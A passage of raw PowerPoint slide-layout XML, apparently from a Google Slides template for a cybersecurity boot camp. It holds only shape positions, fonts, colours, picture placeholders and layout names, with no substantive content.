              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Google Shape;455;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575363" y="1276701"/>
            <a:ext cx="226486" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D85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26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="33018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26. Numbered 1–5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 457"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p2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9" name="Google Shape;459;p2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60" name="Google Shape;460;p2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61" name="Google Shape;461;p2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462" name="Google Shape;462;p2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63" name="Google Shape;463;p2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64" name="Google Shape;464;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="125272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01</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190550" y="127657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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133475" y="127657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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457188" y="196237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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="876063" y="196237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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934400" y="193852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02</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="262237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03</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="264622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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="264622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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="514338" y="340822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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="933213" y="340822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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7991550" y="338437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04</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Google Shape;476;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="4095388"/>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05</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="4119238"/>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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="4119238"/>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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="1267550"/>
            <a:ext cx="7434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80" name="Google Shape;480;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1944963"/>
            <a:ext cx="9144000" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="1554475" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="2648175"/>
            <a:ext cx="9168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82" name="Google Shape;482;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="3394650"/>
            <a:ext cx="9144000" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="1554475" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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83" name="Google Shape;483;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="4119225"/>
            <a:ext cx="9168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guide id="2" pos="5460">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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27. Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 484"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Google Shape;485;p28"/>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87" name="Google Shape;487;p2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88" name="Google Shape;488;p2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89" name="Google Shape;489;p2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490" name="Google Shape;490;p2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91" name="Google Shape;491;p2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92" name="Google Shape;492;p28"/>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93" name="Google Shape;493;p28"/>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8"/>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8"/>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8"/>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97" name="Google Shape;497;p28"/>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98" name="Google Shape;498;p28"/>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499" name="Google Shape;499;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="500" name="Google Shape;500;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="501" name="Google Shape;501;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="502" name="Google Shape;502;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3082261"/>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guide id="2" pos="1512">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>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28. Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 503"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504;p29"/>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2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06" name="Google Shape;506;p2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07" name="Google Shape;507;p2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08" name="Google Shape;508;p2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09" name="Google Shape;509;p2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10" name="Google Shape;510;p2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1" name="Google Shape;511;p29"/>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2" name="Google Shape;512;p29"/>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9"/>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9"/>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9"/>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6" name="Google Shape;516;p29"/>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7" name="Google Shape;517;p29"/>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18" name="Google Shape;518;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="519" name="Google Shape;519;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="520" name="Google Shape;520;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="521" name="Google Shape;521;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3082261"/>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29. Bullets 1–4 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 522"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;p30"/>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25" name="Google Shape;525;p3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26" name="Google Shape;526;p3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27" name="Google Shape;527;p3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28" name="Google Shape;528;p3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29" name="Google Shape;529;p3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0" name="Google Shape;530;p30"/>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1" name="Google Shape;531;p30"/>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0"/>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0"/>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0"/>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5" name="Google Shape;535;p30"/>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6" name="Google Shape;536;p30"/>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37" name="Google Shape;537;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="538" name="Google Shape;538;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="539" name="Google Shape;539;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="540" name="Google Shape;540;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>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3. Title Slide: Cybersecurity ">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Google Shape;28;p4"/>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29" name="Google Shape;29;p4"/>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4"/>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Cybersecurity Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Google Shape;31;p4"/>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32" name="Google Shape;32;p4"/>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3" name="Google Shape;33;p4"/>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 name="Google Shape;34;p4"/>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35" name="Google Shape;35;p4"/>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36" name="Google Shape;36;p4"/>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30. Bullets 1–4 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 541"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Google Shape;542;p31"/>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3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44" name="Google Shape;544;p3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45" name="Google Shape;545;p3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46" name="Google Shape;546;p3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47" name="Google Shape;547;p3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48" name="Google Shape;548;p3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49" name="Google Shape;549;p31"/>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0" name="Google Shape;550;p31"/>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1"/>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1"/>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1"/>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4" name="Google Shape;554;p31"/>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5" name="Google Shape;555;p31"/>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56" name="Google Shape;556;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="557" name="Google Shape;557;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="558" name="Google Shape;558;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="559" name="Google Shape;559;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>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31. Bullets 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 560"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p32"/>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63" name="Google Shape;563;p3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64" name="Google Shape;564;p3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65" name="Google Shape;565;p3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66" name="Google Shape;566;p3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67" name="Google Shape;567;p3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68" name="Google Shape;568;p32"/>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69" name="Google Shape;569;p32"/>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2"/>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2"/>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2"/>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3" name="Google Shape;573;p32"/>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4" name="Google Shape;574;p32"/>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5" name="Google Shape;575;p32"/>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2"/>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77" name="Google Shape;577;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="578" name="Google Shape;578;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="579" name="Google Shape;579;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="580" name="Google Shape;580;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
